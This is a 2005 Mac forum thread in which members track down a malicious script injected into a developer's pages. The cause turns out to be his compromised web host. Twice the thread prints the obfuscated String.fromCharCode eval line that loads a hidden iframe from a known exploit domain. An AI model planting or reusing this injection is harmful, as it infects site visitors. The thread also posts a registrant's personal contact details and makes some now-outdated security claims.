PDA

View Full Version : Do I have a real virus? Oh geezus...


jvaska
Mar 4, 2005, 04:09 AM
Years ago there was a famous virus that had something to do with http://padonack.info...

When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?

Mitthrawnuruodo
Mar 4, 2005, 04:34 AM
I'm sorry, but have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever) then JavaScripts does not insert it self into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...

jvaska
Mar 4, 2005, 04:48 AM
I'm sorry, but have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever) then JavaScripts does not insert it self into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...

Sorry, I'm freaking out herre...

I'm on OSX 10.3.7 using Safari 1.2.4...

My Apache is not configured to add anything. My AdBlock has never posed any problems of any sort...

My webshost claims it's me...and from what I can determine, the problem is coming my end of things (since others are not experiencing the problem while visiting my site).

Is it possible that the router could be doing this? I don't know much about them...

Trying to figure this out...is there a way with Apple Firewall to block outgoing communications with a particular ip address? I can't find this...

jvaska
Mar 4, 2005, 05:07 AM
I'm surfing with Adblock.css and my plugins turned off and it's still happening. And with Firefox too...

This is not good...

<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114, 97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,11 6,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97, 109,101,62,39,41,59))</script>

which spells out "document.write('');"

It does this on static html pages too...

broken_keyboard
Mar 4, 2005, 05:46 AM
From what I can see it will execute the following:

document.write('<iframe height=1 width=1 src=http://padonak.info/fa/></iframe>

Searching the web, it seems that site may contain a jar file that uses a JVM exploit to compromise your machine.

jvaska
Mar 4, 2005, 05:51 AM
Yes, that's why I'm pretty freaked out by this... If you search on padonak and hangup you'll find more info...

I'm trying to get the webhost to dig deeper into the matter but yesterday they flat out said it's me, not them.

Actually, if there are any mac people out there who might be able to take a look at this - just to see if they can get the same javascript code that I'm getting perhaps they could IM me?

Thanks...

Applespider
Mar 4, 2005, 06:24 AM
I'm on my work PC at the moment but did find some info about recent padonak attacks that you (or others might find useful). IT appears that its payload is Windows specific but that on some PCs it was getting round Norton etc

This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.

We were maliciously attacked from a padonak.info website that uses IFRAME to download the "proc.jar java. archive and run MainApp.class This, again through IFRAME, loads other classes which contain JavaByteVerify exploit.


http://msmvps.com/donna/archive/2004/07/03/9463.aspx

Good luck

Mitthrawnuruodo
Mar 4, 2005, 06:25 AM
From this site (http://msmvps.com/donna/archive/2004/07/03/9463.aspx):The gaming website I admin for was hit last week with a padonak.info object. Although at first glance it allowed the JavaByteVerify to enter. It also allowed a backdoor trojan to come in and infect any computer not well guard with an anti virus program/firewall. One person found it got around his Norton, router AND his Black Ice to try leaving a "Bloodhound .6 worm exploit. With another, it dropped in a "Trojan.Win32.Paketes"

The padonak.info object installs on the taskbar and if you clik on it, it will disable the ActiveX preventing the page from working properly. But it allows other nasty buggers to get in too.

I have been combing the web since this attack on Dec 22 and could not find anything under "padonak.info". Finally went to Wilders Secruity forums where a "padobot" and Russian "HangUp" hacker group were mentioned back in October. Then a Google search using the HangUp name.
Sound very much like a Windows problem, first and foremost... how it can affect a Mac is beyond me, even more after skimming through this forum (http://www.wilderssecurity.com/showthread.php?t=13039&page=3)...

Maybe this is a good time to actually run Virex or another AV software and see what they find... ;) ...or ask if your Webservice runs on a PC...?

redeye be
Mar 4, 2005, 06:28 AM
You could always call this guy and ask him what's up
Domain Name: PADONAK.INFO
Registrant Name: Jester Norman
Registrant Organization: SplitInfinity
Registrant Street1: 13553 Poway Rd.
Registrant City: San Diego
Registrant State/Province: CA
Registrant Postal Code: 92064
Registrant Country: US
Registrant Phone: +1.8586792814

if it is a virus you would make the history books! Wouldn't that be great? :o

Good luck.

jvaska
Mar 4, 2005, 06:30 AM
This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.


Yep...the problem I have is that it's interfering with my css for whatever reason. I can see the iframe loading onto the page as it's leaving a little space...

I don't have any kind of system for people to insert comments, etc onto my site...I'm not running a blog...

So, do I breathe a little easier thinking that it's something server-side and not me? I hope so...I don't want to be the first...

Thanks...

Mitthrawnuruodo
Mar 4, 2005, 06:31 AM
By the way: What is the address to your site? It would be interesting to see first hand...

jvaska
Mar 4, 2005, 06:33 AM
By the way: What is the address to your site? It would be interesting to see first hand...

I really don't like putting my url into forums...IM me on ichat and I'll give you the link...

Mitthrawnuruodo
Mar 4, 2005, 06:46 AM
I really don't like putting my url into forums...IM me on ichat and I'll give you the link...vvvaska...
I don't really get that, why have a secret homepage...? :rolleyes:

But, anyhow, what I really want to know is the system your page is running on... Can you run your homepage through Whats that site running? (http://uptime.netcraft.com/up/graph/) (it needs the whole URL, including the http://)...?

My site (http://www.geek.no/), according to this test runs on Linux, with a Apache/2.0.51 (Debian GNU/Linux) DAV/2 FrontPage/5.0.2.2635 PHP/4.3.8-12 mod_ssl/2.0.51 OpenSSL/0.9.7d webserver which is owned by Dataguard AS

Now if your webhost runs on a OS in the Windows family and maybe even an IIS server then we have a very strong suspect, and your machine is most likely as healthy as ever... ;)

jvaska
Mar 4, 2005, 07:10 AM
It's not secret, I just don't want to post it in a forum. I never do...

Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a

Mitthrawnuruodo
Mar 4, 2005, 07:27 AM
It's not secret, I just don't want to post it in a forum. I never do...

Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
Fair enough... ;)

Hmmm... quite a little problem this... have you tried a serch for a proc.jar file...?

And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?

jvaska
Mar 4, 2005, 07:32 AM
Hmmm... quite a little problem this... have you tried a serch for a proc.jar file...?

And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?

Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

Thanks, v

Mitthrawnuruodo
Mar 4, 2005, 07:38 AM
Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

Thanks, v
Well if it didn't have an iframe when you view it through localhost at your own machine and therefore have to be clean when leaving your machine, then it's most likely something that get added by your webhost's server...

Mitthrawnuruodo
Mar 4, 2005, 07:56 AM
Ok, here's an idea: Make a simple, but typical html page, with a likewise simple css file. E-mail them to me at einstein<at>c2i<dot>net with a spesific Subject (that's my "spam"-account so most incoming mail from unknowns will be caught by the junk filter) and I'll upload them on my site and post back the link, if that's clean and your webhost still claims it's you, you can give them that link and say: Why isn't the iframe/script added when my file is uploaded here, then...???

jvaska
Mar 4, 2005, 08:18 AM
Confirmed...this is a local issue...trying to go forward from here...

Hope this is not a virus...

It's affecting Safari and Firefox...not IE...

MisterMe
Mar 4, 2005, 08:29 AM
Years ago there was a famous virus that had something to do with http://padonack.info...

When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.

jvaska
Mar 4, 2005, 08:30 AM
The same problem is on my two machines...I hate to say this...but is it?

I'm not sure what to do right now. Should I just backup and reinstall?

Oh geezus...

jvaska
Mar 4, 2005, 08:32 AM
You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.

Site is not hosted locally...

Would a host insert javascript that clearly drives to a documented hack site?

Nobody can reproduce this. PC's and Mac's now...nobody else has this except for me. On two machines in my network...

Mitthrawnuruodo
Mar 4, 2005, 08:38 AM
Let's see if we can't find the problem (if it really are local, which I strongly doubt, have you checked your ISP...?):
Do you have any "funny" plugins/addons/extentions that you use, either installed directly in your browser (like the Adblock extention in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?

Mitthrawnuruodo
Mar 4, 2005, 08:41 AM
Would a host insert javascript that clearly drives to a documented hack site?
Some (free) hosts add a script (or some sort of frame) to all pages making them displaying ads...

jvaska
Mar 4, 2005, 08:44 AM
Some (free) hosts add a script (or some sort of frame) to all pages making them displaying ads...

My host is not of that caliber...they woudln't do that...

jvaska
Mar 4, 2005, 08:49 AM
Let's see if we can't find the problem (if it really are local, which I strongly doubt, have you checked your ISP...?):
Do you have any "funny" plugins/addons/extentions that you use, either installed directly in your browser (like the Adblock extention in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?

Adbloock is a css file...it still happens when that is turned off...I had a pdf reader plugin but the problem still happens when I take it out of the folder...

A friend who does some mac tech has told me to start looking for invisible files...and dump some user preferences...

but why on both of my computers? they run via the same hub but i rarely actually share files between the two...

redeye be
Mar 4, 2005, 08:57 AM
Just a thought, do you use a proxy server?

Mitthrawnuruodo
Mar 4, 2005, 09:03 AM
Adbloock is a css file...it still happens when that is turned off...I had a pdf reader plugin but the problem still happens when I take it out of the folder...

A friend who does some mac tech has told me to start looking for invisible files...and dump some user preferences...

but why on both of my computers? they run via the same hub but i rarely actually share files between the two...
I'm not looking for your css file... I'm talking about an Extention in Firefox called Adblock, that is a jar file located in ~/Library/Application Support/Firefox/Profiles/default.xxx/extensions/{<lots of rubbish>}/chrome/

If you have installed some additions/extentions to Firefox, they are all jar files (which in this case all could be suspects), and are installed in that extentions folder. (Plug-ins go in the above mentioned folders.) If you have stuff in the extention folder that you don't know what is, delete them (which is good advice no matter what ;)).

But I think the next suspect might be your ISP, as MisterMe said they might also have some sort of ad scheme that hackers might have taken control over...

jvaska
Mar 4, 2005, 09:05 AM
Just a thought, do you use a proxy server?

Oh gosh, I can't remember anymore. No, I don't have one set in OSX but who knows what my router or isp have going on. Those things are mystery to me...

redeye be
Mar 4, 2005, 09:15 AM
No, I don't have one set in OSX but who knows what my router or isp have going on.
Surf to http://www.whatismyip.com/
compare the ip you get there with the external ip of your router. If they're different u are using a proxy (can this be confirmed :o ).

jvaska
Mar 4, 2005, 09:19 AM
Surf to http://www.whatismyip.com/
compare the ip you get there with the external ip of your router. If they're different u are using a proxy (can this be confirmed :o ).

Well, internally it's reported as 10.0.0.11 and externally at whatismyisp it's 83.134...etc...

Mitthrawnuruodo
Mar 4, 2005, 09:50 AM
The router has one IP that is used to identify it on the internet, in this case the 83.-address, then it gives out internal IP numbers, using DNS to all local machines connected (your local LAN), using local addresses, in this case 10.-adressed (or in other LANs 192.168.-adresses), or you can set those yourself, but if your Router is 10.0.0.1, you'll have to use a 10.-address. This has nothing to do with Proxy servers.

jvaska
Mar 4, 2005, 10:38 AM
The router has one IP that is used to identify it on the internet, in this case the 83.-address, then it gives out internal IP numbers, using DNS to all local machines connected (your local LAN), using local addresses, in this case 10.-adressed (or in other LANs 192.168.-adresses), or you can set those yourself, but if your Router is 10.0.0.1, you'll have to use a 10.-address. This has nothing to do with Proxy servers.

I understand that, but how is that going to help me try to deal with this problem? This is not looking good...

Mitthrawnuruodo
Mar 4, 2005, 10:57 AM
I understand that, but how is that going to help me try to deal with this problem? This is not looking good...
I was just trying to point that out, that the IP approach probably wouldn't get you anywhere...

Have you checked with your ISP? That's the best place to look, since both your machines are affected the same way... and noone else has any problems...

Also there's a couple of things that's bothering me:
When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document and the problem I have is that it's interfering with my css for whatever reason
If it's only when you're surfing on your own site then it has to be something on those pages... right...? And how, excactly, is it interfering with your css...?

redeye be
Mar 4, 2005, 11:16 AM
proxy's are able to change the contents of a page.
if you get the same iframe on other pages as well it is deffinetly worth checking it out.

the ip you got from the whatismyip is the one you should compare with the external address of the router. the 10.... is indeed an internal one distributed via DHCP by the router. The router also has an external address (which you probably can find out by simply entering it's internal ip in a browser window). Like i said it is this address you need to compare.

jvaska
Mar 4, 2005, 11:16 AM
Valid questions...

Yes, it only happens when I'm surfing my own site - or the server that my site is on. To test this out I've created simple html files without any includes or anything and it still happens. The mysterious script only appears 30% of the time...

I can tell it's there because I can see the iframe...and sometimes it will affect my css by making the text large.

I asked the host to go through things and they can't reproduce the problem. I can't find anybody who can reproduce the problem.

Actually, it could possibly be an ISP issue. We have some weird service. Periodically my site, and a few others just stop working. I can't access them...but others can. It's rather rare.

I guess I could venture that the ISP has been hacked...but in the same what that it's bizarre that my site sometimes has local outages it's equally weird that only my site gets the mysterious script.

I did try a few other proxy servers and sometimes the script still appeared.

I'm not sure what to call this...a virus...an ISP issue...whatever it is I'm not sure what to do next. I'm not sure if reinstalling the OS would work. I would call the ISP but this is Belgium...we would get nowhere with that.

Sigh...

Thanks for helping out... ;)

jeremy.king
Mar 4, 2005, 12:33 PM
Telnet to your domain name on port 80 and then issue a GET request for your test page.

This will return the source code to you. If you see the iframe code, then your web host has a problem. If not...well....

Since you don't see it everytime, make sure to try several times.

It would definitely help us help you if you published your URL.

jvaska
Mar 4, 2005, 02:56 PM
Telnet to your domain name on port 80 and then issue a GET request for your test page.

This will return the source code to you. If you see the iframe code, then your web host has a problem. If not...well....

Since you don't see it everytime, make sure to try several times.

It would definitely help us help you if you published your URL.

This is a test url page...basic html...nothing more...

http://www.vaska.com/test/

I appreciate all the help people...v

Mitthrawnuruodo
Mar 4, 2005, 03:16 PM
Well we can rule out your ISP, and if that file was "clean" when leaving your computer, it's back to your webhost...

Came up on first try, and since it's added to the top of the file I really suspect something added server side...

dotdotdot
Mar 4, 2005, 03:27 PM
It came up once for me and I am 99% sure it had to do w/ me being on Windows but the second it fully loaded I needed to reboot - firefox froze up and internet went down...

jeremy.king
Mar 4, 2005, 04:09 PM
Its your WEB HOST

I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)

Up came our friend - notice the first line in the source.


<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114, 97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,11 6,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97, 109,101,62,39,41,59))</script><HTML>
<HEAD>
<TITLE>cPanel</TITLE>
<link href="sys_cpanel/css/style.cssx" rel="stylesheet" type="text/css">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<style>
body { font-family: verdana, arial, helvetica, sans-serif; font-size: 11px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; }
a { color:#ffffff; text-decoration:none }
</style>
</HEAD>
<BODY leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr valign="top">
<td height="75" nowrap valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="10%"><a href="http://www.cpanel.net"><img src="sys_cpanel/images/index_01.gif" width="126" height="46" alt="cPanel" border=0></a></td>

<td width="27%"><img src="sys_cpanel/images/index_02.gif" width="343" height="46"></td>
<td width="1%" background="sys_cpanel/images/index_04.gif"><img src="sys_cpanel/images/index_04.gif" width="43" height="46"></td>
<td width="62%" align="right" background="sys_cpanel/images/index_04.gif"><img src="sys_cpanel/images/index_03.gif" width="138" height="46"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td valign="top">

<div style="color:ff9900; font-weight:bold; font-size:24pt; text-align:center">There is no website configured at this address.</div><br>
<br>
<div style="color:ffffff">
You are seeing this page because there is nothing configured for the site you have requested. If you think you are seeing this page in error, please contact the site administrator or datacenter responsible for this site.<br>
</div></td></tr>
<tr><td valign="bottom">
<table width=100%>
<tr><td>
<div style="color:ff9900; font-weight:bold">About cPanel:</div><br>
<div style="color:ffffff">cPanel is a leading provider of software for the webhosting industry. If you would like to learn more about cPanel please visit our website at <a class=josh href="http://www.cpanel.net/">http://www.cpanel.net/</a>. Please be advised that cPanel is not a webhosting company itself, and as such is not responsible for content found elsewhere on this site.</div>
</tr>

</table>
</td>
</tr>
<tr>
<td height="10">
<table width="100%" border="0" cellspacing="0" cellpadding="0" background="sys_cpanel/images/bbg.gif">
<tr align="center">
<td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bbg.gif" width="179" height="22"></td>
<td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bottom_label.gif" width="382" height="22"></td>
<td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bbg.gif" width="179" height="22"></td>
</tr>

</table>
</td>
</tr>
</table>
<!--- REVISION: 1.2 --->
</BODY>
</HTML>

Mitthrawnuruodo
Mar 4, 2005, 04:21 PM
Its your WEB HOST

I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)

Up came our friend - notice the first line in the source.
Nice catch... I think we have a winner...!

jvaska, if your webhost doubts it just give them a link to that... and give 'em a good yelling for letting us run through hoops all day for nothing, as they were the initial suspects... ;)

jackieonasses
Mar 4, 2005, 04:40 PM
wow us MacRumors guys... (and girls) we really know how to solve that stuff! Mad props!


kyle

skipperchong
Mar 4, 2005, 06:56 PM
no joke. great job, peeps. getting all encyclopedia brown and stuff.

redeye be
Mar 5, 2005, 02:42 AM
Its your WEB HOST

I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)

OMG, just had to check this out. Firefox just quit on me :eek:
running 1.0.1 on 10.3.8

nice troubleshooting,
good luck jvaska

jvaska
Mar 5, 2005, 02:54 AM
WOW!!! What's weird is I had others try it and it just wouldn't come up...maybe it only comes up on Mac's? But I had tried other macs...

Well, if they can't nab the virus then I'll ask to be moved to another server. But these guys have always been very professional (I've been with them for a couple years). I'm sure they will read this and get back in there and take care of things.

Relieved...thanks for all the help...v

irmongoose
Mar 5, 2005, 03:00 AM
I used Safari to access the page. It started to download a file called "object.cfm".

The code in the file is really long... too long to post here.




irmongoose

jvaska
Mar 5, 2005, 03:58 AM
I used Safari to access the page. It started to download a file called "object.cfm".

The code in the file is really long... too long to post here.
irmongoose

Oh geezus...that happened to me yesterday but I couldn't figure out where it came from. I just deleted it when it appeared...

Wow...proof of concept there that hackers can at least auto download a file to your computer while using Safari.

gekko513
Mar 5, 2005, 05:34 AM
Oh geezus...that happened to me yesterday but I couldn't figure out where it came from. I just deleted it when it appeared...

Wow...proof of concept there that hackers can at least auto download a file to your computer while using Safari.

I get the object.cfm file in Safari, too. But I don't think the auto download should be considered a new proof of concept since versiontracker among others use a similar approach when you download anything through them.

jvaska
Mar 5, 2005, 05:42 AM
I get the object.cfm file in Safari, too. But I don't think the auto download should be considered a new proof of concept since versiontracker among others use a similar approach when you download anything through them.

Probably. I'm in new waters here...everything I say should be taken as a newbie worrying about what's going on here. ;)

AlexSpark
Mar 5, 2005, 07:55 AM
cmf = coldfusion

i really really wouldnt worry about a coldfusion file

jeremy.king
Mar 5, 2005, 09:07 AM
no joke. great job, peeps. getting all encyclopedia brown and stuff.

Some of my favorite books to read as a kid :D

Cybernanga
Mar 5, 2005, 11:53 AM
It took a couple of reloads in Safari, for it to show up, but it did eventually.

It auto-downloaded a file named "object.cfm"

Norton antivirus immediately gave me the following warnings

"0224653983-3385959983.cache is infected with Bloodhound.exploit.6"

followed by

"proc-.jar-438026a9-412f6e85.zip is infected but cannot be cleaned"

It quarantined both of those files.

yellow
Mar 5, 2005, 12:17 PM
It took a couple of reloads in Safari, for it to show up, but it did eventually.

It auto-downloaded a file named "object.cfm"

Norton antivirus immediately gave me the following warnings

"0224653983-3385959983.cache is infected with Bloodhound.exploit.6"

followed by

"proc-.jar-438026a9-412f6e85.zip is infected but cannot be cleaned"

It quarantined both of those files.

Interestingly, Virex called it by a different name, but an infected file none-the-less..

Scanning file /Users/yellow/Desktop/Downloads/object.cfm
/Users/yellow/Desktop/Downloads/object.cfm
Found the Generic Dropper.b trojan !!!

dotdotdot
Mar 5, 2005, 02:23 PM
cmf = coldfusion

i really really wouldnt worry about a coldfusion file

Well it has a virus so...

Cybernanga
Mar 5, 2005, 05:09 PM
Jvaska, your host is infected. Get them on the phone, and make sure they do something about it.

Mac Users, while this won't attack or harm our Mac's, we can still transmit the virus to our PC brethren, so please do the responsible thing, and use an Anti-Virus to clean your mac, especially if you visited the test site mentioned in this thread.

Oh, if you use VPC, or similar, make sure you run an Anti-Virus in there aswell.

gekko513
Mar 5, 2005, 05:52 PM
Jvaska, your host is infected. Get them on the phone, and make sure they do something about it.

Mac Users, while this won't attack or harm our Mac's, we can still transmit the virus to our PC brethren, so please do the responsible thing, and use an Anti-Virus to clean your mac, especially if you visited the test site mentioned in this thread.

Oh, of you use VPC, or similar, make sure you run an Anti-Virus in there aswell.
How would it spread from a Mac to a PC if it isn't also a Mac virus? If not it would require someone to manually mail that file to someone or share it through som file-sharing, which isn't going to happen, unless of course someone wants to hurt a Windows user on purpose. ;)

mcgarry
Mar 5, 2005, 06:00 PM
How would it spread from a Mac to a PC if it isn't also a Mac virus? If not it would require someone to manually mail that file to someone or share it through som file-sharing, which isn't going to happen, unless of course someone wants to hurt a Windows user on purpose. ;)

A file is a file, whether or not it's a virus. A different file can do different things on different systems. Not necessarily speaking of this particular case, the Mac itself cannot become infected, but could pass along files that could infect others. Apparently inadvertent transfers do happen.

The currently available crop of Mac anti-virus programs basically police such transfers, since they have nothing as of yet from which to protect the Mac itself.

jvaska
Mar 6, 2005, 02:15 AM
I'll contain my comments for the moment...

gekko513
Mar 6, 2005, 07:34 AM
A file is a file, whether or not it's a virus. A different file can do different things on different systems. Not necessarily speaking of this particular case, the Mac itself cannot become infected, but could pass along files that could infect others. Apparently inadvertent transfers do happen.

The currently available crop of Mac anti-virus programs basically police such transfers, since they have nothing as of yet from which to protect the Mac itself.

How would the file pass itself on to a Windows host? It's not like my (randomly picked) com.elgato.eyetv.plist file in my Library suddenly shows up on my brother's Windows PC, is it?

If it does have a mechanism to automatically spread from a Mac, it must be considered to be a Mac virus, too.

I appreciate the better safe than sorry thinking, but I really don't think it is necessary to install anti-virus just for this file. I think there are other valid reasons to install anti-virus on a Mac, but this file isn't one of them, unless, like I said, it is a Mac virus, also.

jvaska
Mar 6, 2005, 11:49 AM
There is a conclusion to this story. After we went back and forth looking at the problem it was realized that the old server needed to be seriously looked at (I'm assuming they will give it an overhaul). In two years this is the first time something like this has happened with my host.

Today, we decided we'd just move me to a new server to get it over with quickly. Done.

I do want to add, that while at times the tech support could have been a little more on the ball, once the powers that be at JIffynet (http://www.jiffynet.net/) caught wind of all of this they took action very quickly. ;)

Cybernanga
Mar 30, 2005, 01:34 AM
How would the file pass itself on to a Windows host? It's not like my (randomly picked) com.elgato.eyetv.plist file in my Library suddenly shows up on my brother's Windows PC, is it?

If it does have a mechanism to automatically spread from a Mac, it must be considered to be a Mac virus, too.

I appreciate the better safe than sorry thinking, but I really don't think it is necessary to install anti-virus just for this file. I think there are other valid reasons to install anti-virus on a Mac, but this file isn't one of them, unless, like I said, it is a Mac virus, also.

If a windows user sends me an infected file, the virus can't do anything while it's on my mac, because the viruses code doesn't tell it how to behave on a mac, but the virus code is still in the file, so if I then send this same file to an uninfected windows user, the virus would still be able to infect their machine, because it is now in an environment where it knows how to behave.

Having anti-virus software on my mac will help prevent the virus from spreading. This is polite behaviour especially if you connect to windows networks, or send email attachments back and forth between different windows users.

Mitthrawnuruodo
Mar 30, 2005, 02:04 AM
If a windows user sends me an infected file, the virus can't do anything while it's on my mac, because the viruses code doesn't tell it how to behave on a mac, but the virus code is still in the file, so if I then send this same file to an uninfected windows user, the virus would still be able to infect their machine, because it is now in an environment where it knows how to behave.

Having anti-virus software on my mac will help prevent the virus from spreading. This is polite behaviour especially if you connect to windows networks, or send email attachments back and forth between different windows users.How will the virus spread if you connect to a windows network? You have to physically move the file yourself. And why would you forward an e-mail containing a virus (it's not like you need an anti virus program to spot them)? That doesn't make any sense...

wdlove
Apr 1, 2005, 07:46 PM
I believe this is a first for me. Can someone alleivate my fear?

++++++++++++++++++++++++++++++++++++++
VIRUS BLOCKER MESSAGE STATUS
++++++++++++++++++++++++++++++++++++++

+ Virus successfully cleaned out of attachment(s):
No attachments are in this category.

+ Attachment(s) deleted due to virus:
1. Doll.zip: W32.Beagle@mm!zip


+++++++++++++++++++
Powered by Symantec
+++++++++++++++++++

++++++++++++++++++++++++++++++++++++++
VIRUS BLOCKER MESSAGE STATUS
++++++++++++++++++++++++++++++++++++++

+ Virus successfully cleaned out of attachment(s):
No attachments are in this category.

+ Attachment(s) deleted due to virus:
1. Cool_MP3.zip: W32.Beagle@mm!zip


+++++++++++++++++++
Powered by Symantec
+++++++++++++++++++

Agathon
Apr 1, 2005, 08:03 PM
It's a win32 virus.

It cannot harm your mac.

Don't worry, there are still no OS X viruses.

spacepower7
Apr 1, 2005, 11:22 PM
As I started reading this thread, I decided to run Norton AV, first time in 6 months. When I got to page 3 of this thread Norton AV was half thru scanning my hard drive, then Norton gave me a nice kernel panic :eek:

MisterMe
Apr 2, 2005, 12:23 AM
How will the virus spread if you connect to a windows network? You have to physically move the file yourself. And why would you forward an e-mail containing a virus (it's not like you need an anti virus program to spot them)? That doesn't make any sense...What in God's name are you talking about? Cybernanga is exactly correct. Antivirus software on the Mac prevents your becoming an inadvertent carrier of Windows viruses. He did not say that Windows viruses can be executed on the Mac. However, antivirus software will disinfect files that originated on Windows computers and warn that the virus exists. You notion that you can spot an infected file by sight is just silly.

Personal Example: One of my colleagues had to do a PowerPoint presentation. His Windows laptop failed a few minutes before he was to go on. I pressed my PowerBook into service to aid him. He loaded his .ppt file on my computer and gave the presentation without a hitch. Later, I installed antivirus software on the PowerBook. The software revealed that the .ppt file was infected a rather common Windows virus. It is possible that the virus caused the Windows laptop to fail in the first place. Although it was too late for my colleague, the antivirus program disinfected the file. At any rate, if antivirus software had been installed on my computer at the time, I would have known about the virus. I could have explained to my colleague that his Windows computer was infected. I could have scolded him about not properly protecting it. You see, in the real world where people work together, having a Windows computer down because of a virus creates problems for everyone. Although I was happy to be able to help my Windows-using colleague, his virus infection created extra work for me.

reckless_0001
Apr 7, 2005, 01:31 PM
That's why web hosting servers should all be unix based.. :D

wdlove
Apr 7, 2005, 07:41 PM
It's a win32 virus.

It cannot harm your mac.

Don't worry, there are still no OS X viruses.

Thank you, because for some reason I'm receiving at least one or two of them a day. So I have just been deleting them.

7on
Apr 7, 2005, 08:09 PM
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

And I wouldn't bother myself with anti-virus. It's not your job on the line because a co-worker couldn't get his ppt working. Anti-virus programs just take up system resources and hdd space. And they are stupid.

Makosuke
Apr 7, 2005, 09:15 PM
That's why web hosting servers should all be unix based.. :DIf that was meant as a dig against IIS, then you shouldn't get overconfident--this particular attack was specifically directed against Linux servers running Apache, as in this case (though the original exploit took advantage of an IIS hole, I believe).

There's no particular reason that it couldn't have targetet UNIX as well--once the server is compromized (which this one was), there's nothing stopping the attacker from installing something to do an exploit like this (randomly insert malicous JS into pages served) regardless of what the server is running (this page has a PDF that explains how a similar attack was carried out: http://vitalsecurity.org/sp2phase3.htm ).

Not to say that *nix and Apache aren't more secure than Win and IIS, but they're not immune to exploits if they're not managed properly (which, based on the "old server" comment earlier in this thread, it sounds like this one wasn't).

I didn't see this thread when it was first posted, but it's a very interesting read.